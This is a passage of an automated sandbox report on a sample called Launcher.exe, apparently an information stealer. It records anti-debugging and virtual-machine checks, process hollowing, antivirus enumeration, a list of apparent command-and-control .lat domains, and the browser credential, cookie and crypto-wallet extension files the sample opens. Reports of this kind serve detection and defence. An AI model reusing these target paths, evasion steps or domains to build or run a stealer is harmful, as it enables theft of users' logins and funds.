                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: C:\Users\user\Desktop\Launcher.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D4073 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009D4073
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009FC19E mov edi, dword ptr fs:[00000030h]0_2_009FC19E
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009C16A0 mov edi, dword ptr fs:[00000030h]0_2_009C16A0
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009E1DBC GetProcessHeap,0_2_009E1DBC
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D4073 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009D4073
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D4067 SetUnhandledExceptionFilter,0_2_009D4067
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D3CB7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009D3CB7
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009DCDB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009DCDB0

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009FC19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_009FC19E
                Source: C:\Users\user\Desktop\Launcher.exeMemory written: C:\Users\user\Desktop\Launcher.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeCode function: GetLocaleInfoW,0_2_009E11AC
                Source: C:\Users\user\Desktop\Launcher.exeCode function: EnumSystemLocalesW,0_2_009E16A7
                Source: C:\Users\user\Desktop\Launcher.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_009E566E
                Source: C:\Users\user\Desktop\Launcher.exeCode function: EnumSystemLocalesW,0_2_009E58BF
                Source: C:\Users\user\Desktop\Launcher.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_009E595A
                Source: C:\Users\user\Desktop\Launcher.exeCode function: EnumSystemLocalesW,0_2_009E5BAD
                Source: C:\Users\user\Desktop\Launcher.exeCode function: EnumSystemLocalesW,0_2_009E5CE1
                Source: C:\Users\user\Desktop\Launcher.exeCode function: GetLocaleInfoW,0_2_009E5C0C
                Source: C:\Users\user\Desktop\Launcher.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_009E5DD3
                Source: C:\Users\user\Desktop\Launcher.exeCode function: GetLocaleInfoW,0_2_009E5D2C
                Source: C:\Users\user\Desktop\Launcher.exeCode function: GetLocaleInfoW,0_2_009E5ED9
                Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D47EF GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_009D47EF
                Source: C:\Users\user\Desktop\Launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Launcher.exe, 00000003.00000003.2373792847.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000001010000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2481834662.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2482847512.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000001010000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373917806.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000001010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\Launcher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6292, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Launcher.exe, 00000003.00000003.2386728051.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: Launcher.exe, 00000003.00000003.2386728051.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Launcher.exe, 00000003.00000003.2319453403.00000000039D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertym#~FlP
                Source: Launcher.exe, 00000003.00000003.2386728051.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Launcher.exe, 00000003.00000003.2318603921.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Launcher.exeString found in binary or memory: ExodusWeb3
                Source: Launcher.exe, 00000003.00000003.2386728051.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Launcher.exe, 00000003.00000003.2349716206.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Launcher.exe, 00000003.00000003.2349716206.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
